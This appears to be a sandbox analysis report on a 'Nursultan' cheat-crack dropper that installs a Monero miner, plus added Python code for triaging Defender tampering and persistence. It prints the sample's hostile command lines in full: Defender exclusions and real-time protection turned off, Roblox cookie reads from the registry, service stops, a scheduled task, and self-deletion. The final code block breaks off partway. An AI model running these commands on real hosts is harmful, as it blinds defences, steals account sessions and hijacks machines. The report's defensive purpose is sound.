PID 4640 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 5084 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 5084 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 5084 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
PID 5084 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
PID 4640 wrote to memory of 3540 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 3540 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2224 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4640 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2160 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2160 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\Wbem\wmic.exe
PID 4640 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\Wbem\wmic.exe
PID 2160 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
PID 2160 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
PID 2160 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2160 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\Wbem\wmic.exe
PID 4640 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\Wbem\wmic.exe
PID 4640 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\Wbem\wmic.exe
PID 4640 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\Wbem\wmic.exe
PID 4640 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2160 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
PID 2160 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
PID 2160 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2160 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\Wbem\wmic.exe
PID 4640 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\Wbem\wmic.exe
PID 2160 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\Conhost.exe
PID 2160 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\Conhost.exe
PID 2160 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\Conhost.exe
PID 2160 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
PID 2160 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
PID 2540 wrote to memory of 2076 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 2076 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2540 wrote to memory of 2076 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
The remaining 52 rows of this table were recorded with no description, indicator, process or target.

Processes

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
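The Add-MpPreference and Set-MpPreference command lines recorded in this process list are the sample's Defender tampering, and a responder needs them reduced to two answers: which paths, processes and extensions are now excluded from scanning, and which protections were switched off. The following is an added example for this report, not code from the sandbox or from the malware. Its five sample command lines are copied from this process list; the regexes, the severity thresholds and the BROAD_PATHS set are its own assumptions. One caveat when reading the recorded Set-MpPreference line: Windows PowerShell 5.1, which is what `WindowsPowerShell\v1.0\powershell.exe` launches, does not accept `&&` as a statement separator (that operator arrived in PowerShell 7), so on a host running that version the whole line fails to parse before any switch is applied, while the single-statement Add-MpPreference exclusions on the other lines do parse and do apply. The parser extracts the switches anyway, because the intent is what matters for triage. The fifth sample, the .ROBLOSECURITY registry read, is included as a negative case; `HKLN:` is not a registry drive, so that lookup as recorded fails.

```python
"""Triage Windows Defender tampering in recorded process command lines.

Added example for this report; it is not sandbox output or malware code.
SAMPLE_CMDLINES are copied from the Processes section; the regexes, the
severity thresholds and the BROAD_PATHS set are this example's assumptions.
"""
import re

# Constructed sample: five command lines copied from the process list above.
SAMPLE_CMDLINES = [
    r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'""",
    r""""powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2""",
    r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'""",
    r"""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force""",
    r""""powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY""",
]

# Exclusion parameters and their argument: a quoted string, an @() array or a bare token.
EXCLUSION_RE = re.compile(
    r"-(ExclusionPath|ExclusionProcess|ExclusionExtension)\s+"
    r"('[^']*'|\"[^\"]*\"|@\([^)]*\)|\S+)",
    re.IGNORECASE,
)
KIND = {"exclusionpath": "path", "exclusionprocess": "process",
        "exclusionextension": "extension"}

# Set-MpPreference switches whose recorded value turns a protection off.
# SubmitSamplesConsent 2 is the numeric form of NeverSend.
DISABLE_RE = re.compile(
    r"-(Disable\w+)\s+\$true"
    r"|-(EnableControlledFolderAccess|MAPSReporting)\s+Disabled"
    r"|-(EnableNetworkProtection)\s+AuditMode"
    r"|-(SubmitSamplesConsent)\s+(?:NeverSend|2)\b",
    re.IGNORECASE,
)

# Exclusions that cover whole user-writable trees (assumed list, compared lower-case).
BROAD_PATHS = {"$env:userprofile", "$env:programdata", "c:", "c:\\users",
               "c:\\programdata", "%userprofile%", "%programdata%"}


def parse_exclusions(cmdline):
    """Return (kind, value) pairs added by Add-MpPreference; @() arrays are expanded."""
    if not re.search(r"\bAdd-MpPreference\b", cmdline, re.IGNORECASE):
        return []
    found = []
    for kind, raw in EXCLUSION_RE.findall(cmdline):
        values = [v.strip() for v in raw[2:-1].split(",")] if raw.startswith("@(") else [raw]
        found += [(KIND[kind.lower()], v.strip("'\"")) for v in values]
    return found


def parse_disabled_features(cmdline):
    """Return the Set-MpPreference switches that disable a protection, deduplicated, in order."""
    if not re.search(r"\bSet-MpPreference\b", cmdline, re.IGNORECASE):
        return []
    names = [next(g for g in m.groups() if g) for m in DISABLE_RE.finditer(cmdline)]
    return list(dict.fromkeys(names))


def severity(cmdline):
    """Rank one command line as critical, high, medium or none (thresholds are assumed)."""
    disabled = [d.lower() for d in parse_disabled_features(cmdline)]
    exclusions = parse_exclusions(cmdline)
    if "disablerealtimemonitoring" in disabled:
        return "critical"
    for kind, value in exclusions:
        if kind == "extension" or value.lower().rstrip("\\") in BROAD_PATHS:
            return "critical"
    if disabled or any(kind == "process" for kind, _ in exclusions):
        return "high"
    return "medium" if exclusions else "none"


def triage(cmdlines):
    """Summarise the Defender state left behind after every command line has run."""
    order = ["none", "medium", "high", "critical"]
    report = {"exclusions": [], "disabled": [], "worst": "none"}
    for cmdline in cmdlines:
        report["exclusions"] += parse_exclusions(cmdline)
        report["disabled"] += [f for f in parse_disabled_features(cmdline)
                               if f not in report["disabled"]]
        report["worst"] = max(report["worst"], severity(cmdline), key=order.index)
    return report


if __name__ == "__main__":
    for cmdline in SAMPLE_CMDLINES:
        print(severity(cmdline).upper().ljust(8), cmdline[:70])
    print(triage(SAMPLE_CMDLINES))
```

The broad exclusion (the whole user profile and ProgramData plus every .exe) is ranked above a single-file exclusion because it covers the miner's install directory under C:\ProgramData and the svchost.exe copy under AppData\Roaming that appear later in this listing; after that line, Defender would not scan either even with real-time protection restored.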

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "XMRKNZQC"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "XMRKNZQC" binpath= "C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe" start= "auto"

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
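The schtasks, sc.exe, wusa, powercfg, cmd.exe and attrib.exe command lines recorded above are the parts of this chain that survive a reboot or blind the host: a scheduled task named svchost that relaunches C:\Users\Admin\AppData\Roaming\svchost.exe every minute at the highest run level, the Windows Update, Update Orchestrator, Update Medic, BITS and Delivery Optimization services stopped and KB890830 (the Malicious Software Removal Tool) uninstalled, the event log service stopped, standby and hibernation timeouts zeroed so the miner keeps running, the XMRKNZQC service installed from a ProgramData path and started, the dropper hidden with attrib +h +s and then deleted after a ping delay. The following is an added example for this report, not sandbox or malware code: it tags each recorded (image, command line) pair with a tactic and a rule name, then correlates three of those rules into a miner-install verdict. The sample pairs are copied from this process list; the rule names, the tactic labels, the SYSTEM_NAMES and UPDATE_SERVICES sets and the correlation are its own assumptions.

```python
"""Tag a recorded process chain with the behaviours that matter for response.

Added example for this report, not sandbox output or malware code. The
(image, command line) pairs are copied from the Processes section; the rule
names, tactic labels and the miner_install_chain correlation are assumptions.
"""
import re

SAMPLE_PROCESSES = [  # constructed from command lines recorded in this report
    (r"C:\Windows\SysWOW64\schtasks.exe",
     r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"'),
    (r"C:\Windows\system32\cmd.exe", r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart"),
    (r"C:\Windows\system32\sc.exe", r"C:\Windows\system32\sc.exe stop UsoSvc"),
    (r"C:\Windows\system32\sc.exe", r"C:\Windows\system32\sc.exe stop wuauserv"),
    (r"C:\Windows\system32\powercfg.exe", r"C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0"),
    (r"C:\Windows\system32\sc.exe",
     r'C:\Windows\system32\sc.exe create "XMRKNZQC" binpath= "C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe" start= "auto"'),
    (r"C:\Windows\system32\sc.exe", r"C:\Windows\system32\sc.exe stop eventlog"),
    (r"C:\Windows\system32\sc.exe", r'C:\Windows\system32\sc.exe start "XMRKNZQC"'),
    (r"C:\Windows\SYSTEM32\cmd.exe",
     r'"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause'),
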